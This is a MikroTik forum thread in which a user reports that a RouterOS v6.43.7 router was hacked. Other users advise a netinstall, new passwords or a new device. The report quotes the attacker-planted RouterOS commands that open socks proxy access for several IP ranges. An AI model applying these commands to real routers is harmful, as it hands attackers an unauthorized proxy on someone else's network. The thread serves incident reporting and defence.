Community discussions

MikroTik App
  4. RouterOS
  5. General

ROS v6.43.x Hacked using same old vulnerability

Post Reply
 
hsabrey
just joined
Topic Author
Posts: 21
Joined: Tue Jul 01, 2014 2:37 pm

ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 12:46 pm

hello
today i found my RB2011 been compromised using the same vulnerability and here is the photo attached.
this time they fitch a file from the internet which i do not what it is?
mean time the version is v6.43.7
the script added a file in the mikrotik and this it's content
Code: Select all
/ip socks access add src-address=5.188.0.0/15 action=allow
/ip socks access add src-address=192.243.0.0/16 action=allow
/ip socks access add src-address=5.9.0.0/16 action=allow
/ip socks access add src-address=5.104.0.0/16 action=allow
/ip socks access add src-address=0.0.0.0/0 action=deny
in the attached photo you may see that this socks IPs are added more than 53000 times due to the script runs every 15 second.


Image
Top
 
R1CH
Forum Guru
Forum Guru
Posts: 1109
Joined: Sun Oct 01, 2006 11:44 pm

Re: ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 1:05 pm

Netinstall the latest version with known clean config and change all passwords. Either you didn't change passwords or you didn't netinstall, so attackers were able to get back onto your device.
Top
 
Redmor
Member Candidate
Member Candidate
Posts: 256
Joined: Wed May 31, 2017 7:40 pm
Location: Italy

Re: ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 10:44 pm

Destroy RB and buy a new one.
Top
Post Reply
  4. RouterOS
  5. General